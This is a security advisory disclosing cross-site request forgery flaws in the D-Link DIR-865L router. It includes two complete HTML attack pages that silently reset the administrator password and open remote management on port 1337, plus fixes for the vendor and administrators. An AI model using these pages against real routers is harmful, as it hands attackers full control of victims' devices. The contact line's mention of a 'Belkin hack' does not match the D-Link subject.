Taking over the D-Link DIR865L

[return to summary]

  • The DIR865L can be taken over by a remote adversary through CSRF attack.

Description

The DIR865L router is susceptible to several CSRF attacks, which allow an attacker to forge HTML forms and execute actions on behalf of a legitimate user. ISE created a proof of concept that when executed by an unsuspecting device administrator, changes the administrator credentials and enables remote management services.

Attack Requirements

  • The victim must have an active management session with the router.
  • The victim must be fooled in to performing an action (e.g., by clicking an attacker provided link), browse to a malicious or compromised site, or be the victim of a man-in-the-middle attack.

Details

All HTML forms present in the D-Link DIR865L are susceptible to Cross-Site Request Forgery.

  • Vulnerable Firmware is 1.03.
  • Other versions of the firmware were not tested.

Impact

A successful attack exploiting this vulnerability can give a remote adversary full control of the victim router.

Recommendations to the vendor

  • Cross-Site request forgery can be prevented by including an unpredictable token in each HTTP request submitted to the web server. At a minimum, these tokens should be unique to each user, but it is recommended that each HTML form delivered contain a unique token.
  • In addition to HTML form tokens, HTTP referrer checking should be enabled.
  • Validate HTTP Basic Authentication Header for all HTTP requests.
  • Additional information for vendors regarding immediate and long term fixes for these issues can be found on our summary page here.

Recommendations to device administrators

  • (4/13/2013) There is not currently an available firmware upgrade that will remedy this vulnerability.
  • Take additional preventative measures and precautions by following the steps outlined on our summary page here.

Proof of Concept

In the following proof of concept attack, we assume that a device administrator with an active management session established with the router has browsed to a malicious web page. Once there, a series of automatic form submissions take place, one after the other, to the administrator's router, from the administrator's browser. Since the administrator has a current session established with the router, the form submissions are processed.

The first form (Figure 1) is pre-filled out with the information required to set the administrator password to "ISE" and enable remote management on port 1337. The second form completes the action, by instructing the D-Link to save the settings it has been given. 


<html>
<head>
<title> D-LINK DIR-865L CSRF</title>
<!-- Firmware Version: 1.03 Fri 02 Nov 2012 -->
</head>

<body>

<form name="dlinkXML" action="http://192.168.0.1/hedwig.cgi" 
	enctype="text/plain" method="post">
<input type="hidden" name="<?xml version" value="'1.0' encoding='UTF-8'?>
<postxml>
	<module>
		<service>DEVICE.ACCOUNT</service>
		<device>
			<gw_name>DIR-865L</gw_name>
			<account>
				<seqno>1</seqno>
				<max>2</max>
				<count>1</count>
				<entry>
					<uid>USR-</uid>
					<name>Admin</name>
					<usrid/>
					<password>ISE</password>
					<group>0</group>
					<description/>
				</entry>
			</account>
			<group>
				<seqno/>
				<max/>
				<count>0</count>
			</group>
			<session>
				<captcha>0</captcha>
				<dummy/>
				<timeout>600</timeout>
				<maxsession>128</maxsession>
				<maxauthorized>16</maxauthorized>
			</session>
		</device>
	</module>
	<module>
		<service>HTTP.WAN-1</service>
		<inf>
			<web>1337</web>
			<https_rport></https_rport>
			<stunnel>1</stunnel>
			<weballow>
				<hostv4ip/>
			</weballow>
			<inbfilter></inbfilter>
		</inf>
	</module>
	<module>
		<service>HTTP.WAN-2</service>
		<inf>
			<web>1337</web>
			<weballow></weballow>
		</inf>
	</module>
	<module>
		<service>INBFILTER</service>
		<acl>
			<inbfilter>
				<seqno>1</seqno>
				<max>24</max>
				<count>0</count>
			</inbfilter>
		</acl>
		<ACTIVATE>ignore</ACTIVATE>
		<FATLADY>ignore</FATLADY>
		<SETCFG>ignore</SETCFG>
	</module>
	<module>
		<service>SHAREPORT</service>
		<FATLADY>ignore</FATLADY>
		<ACTIVATE>ignore</ACTIVATE>
	</module>
</postxml>">
</form>

<script>
function CSRF1() {document.dlinkXML.submit();};window.setTimeout(CSRF1,1000)
function CSRF2() {window.open("http://192.168.0.100/dlinkCSRF2.html");};
window.setTimeout(CSRF2,1000)
</script>

</body>
</html>

Figure 1. Attack page 1.


<html>
<head>
<title> D-LINK DIR-865L CSRF</title>
<!-- Firmware: 1.03 Fri 02 Nov 2012 -->
</head>

<body>

<form name="DLINK" action="http://192.168.0.1/pigwidgeon.cgi" method="post">
<input type="hidden" name="ACTIONS" value="SETCFG,SAVE,ACTIVATE">
</form>

<script>
document.DLINK.submit()
</script>

</body>
</html>

Figure 2. Attack page 2.

At this point, the attacker can remotely administer, and thereby remotely control the router.

References

  • CVE-2013-3095: Cross-Site Request Forgery
  • CVE-2013-3096: Unauthenticated Hardware Linking

Credit

  • Discovered By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators
  • Exploited By: Jacob Holcomb – Security Analyst @ Independent Security Evaluators

Contact Information

  • For more information on this particular Belkin hack, you can contact us at routers@www.ise.io
  • Alternatively, for more general information on ISE, you can reach us using contact@www.ise.io